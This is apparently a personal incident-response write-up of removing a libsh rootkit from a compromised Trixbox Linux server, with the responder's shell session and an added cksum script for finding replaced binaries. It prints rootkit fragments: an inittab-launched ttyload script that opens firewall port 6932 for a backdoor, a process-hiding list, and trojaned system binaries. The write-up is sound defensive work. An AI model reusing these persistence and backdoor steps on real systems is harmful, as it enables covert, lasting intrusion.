Comparison with hackers


Zhou haihan/Wen 2009.7.27

A former colleague from a startup called me out of the blue: a Trixbox machine had been attacked, and since I know Linux he asked me for help.

I connected to the Linux machine via remote desktop and found that SSH protocol 2 could not connect at all; fortunately SSH protocol 1 still worked. I checked the SSH configuration and found nothing unusual, restarted sshd, and then checked port usage: netstat could not show which program was occupying the sshd port.

 

Running a plain cd in the root shell switched to /usr/lib/libsh: root's home directory had been pointed there.

 

But:

ls -l /usr/lib > tmp
grep libsh tmp

returns nothing: libsh is invisible to ls.

 

Deleting, moving or renaming it as root is refused with a permission error:

rm -rf /usr/lib/libsh

reports that the operation is not permitted.

 

ps -ef showed a suspicious process:

ls -c <x.x:yyyy> /dev/null 2>&1

x.x is an IP address located in Poland; obviously this address is a stepping stone used by the attacker.

The attacker may be sending messages remotely through the modified ls.

 

ls /usr/bin

Key binaries such as ls, top, ps and netstat had been replaced: their owner was not root but uid 112, with group 114, and they could not be deleted or modified.

 

The operations were as follows:

 

find / -nouser

/etc/shell/stealth
/etc/shell/bash
/etc/shell/randfiles
/etc/shell/randfiles/randnicks.e
/etc/shell/randfiles/randpickup.e
/etc/shell/randfiles/randsignoff.e
/etc/shell/randfiles/randsay.e
/etc/shell/randfiles/randkicks.e
/etc/shell/randfiles/randaway.e
/etc/shell/randfiles/randversions.e
/etc/shell/randfiles/randinsult.e
/etc/shell/cyc.set
/etc/shell/cyc.levels
/etc/shell/cyc.help
/etc/shell/cyc.acc
/etc/shell/cyc.pid
/root/libsh1/hide1
/root/libsh1/.bashrc
/usr/bin/dir
/usr/bin/find
/usr/bin/pstree
/usr/bin/top
/usr/bin/md5sum
/bin/netstat
/bin/ps
/bin/ls
/sbin/ttymon
/sbin/ttyload
/sbin/ifconfig

[trixbox1.localdomain .backup]# pwd
/root/libsh1/.backup

[trixbox1.localdomain .backup]# ls -l
total 740
-rwxr-xr-x 1 root  93560 Jun 27 00:23 dir
-rwxr-xr-x 1 root 151244 Jun 27 00:23 find
-rwxr-xr-x 1 root  71528 Jun 27   :23 ifconfig
-rwxr-xr-x 1 root  93560 Jun 27 00:23 ls
-rwxr-xr-x 1 root  27728 Jun 27 00:23 md5sum
-rwxr-xr-x 1 root 121140 Jun 27 00:23 netstat
-r-xr-x    1 root  79036 Jun 27       ps
-rwxr-xr-x 1 root  18644 Jun 27 00:23 pstree
-r-xr-x    1 root  58104 Jun 27       top

[trixbox1.localdomain .backup]# lsattr /bin/ps
s---ia------- /bin/ps

[trixbox1.localdomain .backup]# chattr -iau /bin/ps
[trixbox1.localdomain .backup]# cp ps /bin/.
cp: overwrite '/bin/./ps'? y
[trixbox1.localdomain .backup]# chattr -iau /bin/netstat /bin/ls
[trixbox1.localdomain .backup]# cp netstat /bin/netstat
cp: overwrite '/bin/netstat'? y
[trixbox1.localdomain .backup]# cp ls /bin/ls
cp: overwrite '/bin/ls'? y
[trixbox1.localdomain .backup]# chattr -iau /usr/bin/{top,pstree,dir,md5sum,find}
[trixbox1.localdomain .backup]# cp {top,pstree,dir,md5sum,find} /usr/bin/.
cp: overwrite '/usr/bin/./top'? y
cp: overwrite '/usr/bin/./pstree'? y
cp: overwrite '/usr/bin/./dir'? y
cp: overwrite '/usr/bin/./md5sum'? y
cp: overwrite '/usr/bin/./find'? y

[trixbox1.localdomain .backup]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address              Foreign Address            State        PID/Program name
tcp        0      0 0.0.0.0:6600               0.0.0.0:*                  LISTEN       2030/ircd
tcp        0      0 0.0.0.0:3306               0.0.0.0:*                  LISTEN       1979/mysqld
tcp        0      0 0.0.0.0:5038               0.0.0.0:*                  LISTEN       2306/asterisk
tcp        0      0 0.0.0.0:111                0.0.0.0:*                  LISTEN       1651/portmap
tcp        0      0 0.0.0.0:1010               0.0.0.0:*                  LISTEN       1676/rpc.statd
tcp        0      0 0.0.0.0:6932               0.0.0.0:*                  LISTEN       2440/ttyload
tcp        0      0 10.1.0.13:3306             60.10.140.68:3221          ESTABLISHED  1979/mysqld
tcp        0      0 :::50021                   :::*                       LISTEN       1838/sshd
tcp        0      0 :::88                      :::*                       LISTEN       9351/httpd
tcp        0      0 :::443                     :::*                       LISTEN       9351/httpd
tcp        0      0 ::ffff:10.1.0.13:50021     ::ffff:10.1.0.68:2967      ESTABLISHED  10403/2
udp        0      0 0.0.0.0:32768              0.0.0.0:*                               1790/mDNSResponder
udp        0      0 0.0.0.0:5060               0.0.0.0:*                               2306/asterisk
udp        0      0 0.0.0.0:69                 0.0.0.0:*                               1854/xinetd
udp        0      0 0.0.0.0:4569               0.0.0.0:*                               2306/asterisk
udp        0      0 0.0.0.0:5353               0.0.0.0:*                               1790/mDNSResponder
udp        0      0 0.0.0.0:1004               0.0.0.0:*                               1676/rpc.statd
udp        0      0 0.0.0.0:1007               0.0.0.0:*                               1676/rpc.statd
udp        0      0 0.0.0.0:111                0.0.0.0:*                               1651/portmap
raw        0      0 0.0.0.0:1                  0.0.0.0:*                  7            2447/ttymon
...

[trixbox1.localdomain .backup]# ls -l /lib/libsh.so
total 728
-rwxr-xr-x 1 root     722684 Jun 27   :23 bash
-rw-r--    1 root 114    478 Jun 27       shdcf
-rwx------ 1 122  114    525 Apr 17  2003 shhk
-rwx------ 1 122  114    329 Apr 17  2003 shhk.pub
-rwx------ 1 122  114    512 Jul 21       shrs
[trixbox1.localdomain .backup]# mv /lib/libsh.so/ /root/libsh.so_bak
mv: cannot move '/lib/libsh.so/' to '/root/libsh.so_bak': Operation not permitted
[trixbox1.localdomain .backup]# chattr -iau /lib/libsh.so/
[trixbox1.localdomain .backup]# mv /lib/libsh.so/ /root/libsh.so_bak

[trixbox1.localdomain .backup]# find / -group 114
/root/libsh1/.sniff/shsniff
/root/libsh1/.sniff/shp
/root/libsh1/hide1
/root/libsh1/shsb
/root/libsh1/.bashrc
/root/libsh.so_bak/shhk.pub
/root/libsh.so_bak/shdcf
/root/libsh.so_bak/shhk
/root/libsh.so_bak/shrs
/usr/bin/dir
/usr/bin/find
/usr/bin/pstree
/usr/bin/top
/usr/bin/md5sum
/bin/netstat
/bin/ps
/bin/ls
find: /proc/25743/task/25743/fd/4: No such file or directory
find: /proc/25743/fd/4: No such file or directory
/sbin/ttymon
/sbin/ttyload
/sbin/ifconfig

[trixbox1.localdomain .backup]# chmod 700 /sbin/ifconfig
[trixbox1.localdomain .backup]# chown root:root /sbin/ifconfig
[trixbox1.localdomain .backup]# ll /sbin/ifconfig
-rwx------ 1 root 71528 Jul 21 23:38 /sbin/ifconfig

[trixbox1.localdomain ~]# vi /etc/inittab

# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
# Loading Standard TTYs
0:2345:once:/usr/sbin/ttyload
# Run gettys in standard runlevels

 

[trixbox1.localdomain .backup]# find / -name "*" -exec grep -l "ttyload" {} \;
/etc/inittab
/etc/rc.d/nouser
/etc/prelink.cache
/usr/include/proc.h
/usr/sbin/ttyload

[trixbox1.localdomain ~]# vi /usr/sbin/ttyload

/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1
/sbin/ttylib >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 6932 -j ACCEPT
iptables -I INPUT -p tcp --dport 6932 -j ACCEPT

[trixbox1.localdomain ~]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address              Foreign Address            State        PID/Program name
tcp        0      0 0.0.0.0:6600               0.0.0.0:*                  LISTEN       2030/ircd
tcp        0      0 0.0.0.0:3306               0.0.0.0:*                  LISTEN       1979/mysqld
tcp        0      0 0.0.0.0:5038               0.0.0.0:*                  LISTEN       2306/asterisk
tcp        0      0 0.0.0.0:111                0.0.0.0:*                  LISTEN       1651/portmap
tcp        0      0 0.0.0.0:1010               0.0.0.0:*                  LISTEN       1676/rpc.statd
tcp        0      0 0.0.0.0:6932               0.0.0.0:*                  LISTEN       2440/ttyload   // attack !!!
tcp        0      0 10.1.0.13:3306             60.10.140.68:3221          ESTABLISHED  1979/mysqld
tcp        0      0 :::50021                   :::*                       LISTEN       1838/sshd
tcp        0      0 :::88                      :::*                       LISTEN       9351/httpd
tcp        0      0 :::443                     :::*                       LISTEN       9351/httpd
tcp        0      0 ::ffff:10.1.0.13:50021     ::ffff:10.1.0.68:2967      ESTABLISHED  10403/0
udp        0      0 0.0.0.0:32768              0.0.0.0:*                               1790/mDNSResponder
udp        0      0 0.0.0.0:5060               0.0.0.0:*                               2306/asterisk
udp        0      0 0.0.0.0:69                 0.0.0.0:*                               1854/xinetd
udp        0      0 0.0.0.0:4569               0.0.0.0:*                               2306/asterisk
udp        0      0 0.0.0.0:5353               0.0.0.0:*                               1790/mDNSResponder
udp        0      0 0.0.0.0:1004               0.0.0.0:*                               1676/rpc.statd
udp        0      0 0.0.0.0:1007               0.0.0.0:*                               1676/rpc.statd
udp        0      0 0.0.0.0:111                0.0.0.0:*                               1651/portmap
raw        0      0 0.0.0.0:1                  0.0.0.0:*                  7            2447/ttymon

[trixbox1.localdomain .backup]# cat /etc/rc.d/nouser
/etc/shell/stealth
/etc/shell/bash
/etc/shell/randfiles
/etc/shell/randfiles/randnicks.e
/etc/shell/randfiles/randpickup.e
/etc/shell/randfiles/randsignoff.e
/etc/shell/randfiles/randsay.e
/etc/shell/randfiles/randkicks.e
/etc/shell/randfiles/randaway.e
/etc/shell/randfiles/randversions.e
/etc/shell/randfiles/randinsult.e
/etc/shell/cyc.set
/etc/shell/cyc.levels
/etc/shell/cyc.help
/etc/shell/cyc.acc
/etc/shell/cyc.pid
/root/libsh1/hide1
/root/libsh1/.bashrc
/usr/bin/dir
/usr/bin/find
/usr/bin/pstree
/usr/bin/top
/usr/bin/md5sum
/bin/netstat
/bin/ps
/bin/ls
/sbin/ttymon
/sbin/ttyload
/sbin/ifconfig

[trixbox1.localdomain .backup]# cat /usr/include/proc.h
3 burim
3 mirkforce
3 synscan
3 ttyload
3 ttylib
3 shsniff
3 ttymon
3 shsb
3 shp
3 hide
4 ttyload

 

The session above shows how the attributes on /usr/lib/libsh were cleared so it could be moved to /root, and how the files touched by the rootkit were tracked down. The infection is extensive, and every core file points back to ttyload. /usr/lib/libsh contained a hidden .backup directory that appears to hold correct copies of the original binaries, so the attributes were cleared and ls, top, netstat, ps and the other key executables were restored from it.

Finally, all infected files were replaced with clean versions or deleted, which restored the SSH protocol 2 connection. A crontab entry that wiped the logs once a minute was removed, as was the inittab entry that started ttyload automatically. I asked them to scan for vulnerabilities with tools like Nessus and chkrootkit; it is not clear whether the entry point was a system vulnerability, an Asterisk vulnerability or a PHP vulnerability in the HTTP service, so they should apply the relevant patches to prevent further attacks.
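Restoring binaries from the .backup directory only helps if you can tell which live files actually differ from the known-good copies, and on this host md5sum, find and ls had themselves been replaced. As an added example (not code from the original post), the script below compares a baseline tree against the live tree with cksum and reports every file that changed or went missing; it assumes the shell, find, cksum and awk it runs come from clean media (a rescue boot with the suspect filesystem mounted), and the demonstration data at the bottom is constructed.

```shell
#!/bin/sh
# Added example, not part of the original post: compare a tree of
# known-good binaries (the post's .backup directory, a clean install, or
# rescue media) against the live system and report what differs. Assumes
# find, cksum and awk are trusted copies, not the host's own.

# compare_trees BASELINE LIVE
# Prints "CHANGED relpath" when the live file's checksum or size differs
# from the baseline copy and "MISSING relpath" when the live file is
# absent. Files present only in LIVE are not reported; finding those is
# a separate inventory step (the post used find -nouser and -group 114).
compare_trees() {
    base="$1"
    live="$2"
    ( cd "$base" && find . -type f ) | sed 's|^\./||' | sort |
    while IFS= read -r rel; do
        if [ ! -f "$live/$rel" ]; then
            printf 'MISSING %s\n' "$rel"
            continue
        fi
        # cksum on stdin prints "crc size" with no filename
        b=$(cksum < "$base/$rel" | awk '{ print $1, $2 }')
        l=$(cksum < "$live/$rel" | awk '{ print $1, $2 }')
        [ "$b" = "$l" ] || printf 'CHANGED %s\n' "$rel"
    done
}

# Constructed demonstration data: a baseline with ps, ls and netstat,
# and a "live" tree where ps was swapped, ls is intact, netstat is gone
# and an unrelated extra file appeared.
demo_compare() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/base/bin" "$t/live/bin"
    printf 'original ps\n'      > "$t/base/bin/ps"
    printf 'trojaned ps\n'      > "$t/live/bin/ps"
    printf 'original ls\n'      > "$t/base/bin/ls"
    printf 'original ls\n'      > "$t/live/bin/ls"
    printf 'original netstat\n' > "$t/base/bin/netstat"
    printf 'extra top\n'        > "$t/live/bin/top"
    compare_trees "$t/base" "$t/live"
    rm -rf "$t"
}

demo_compare
```

The post's own restore sequence applies to each CHANGED path: clear the i/a/u attributes with chattr, then copy the baseline file over the live one. On an RPM-based system such as Trixbox, rpm -V run from clean media is the package-level cross-check for the same question.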
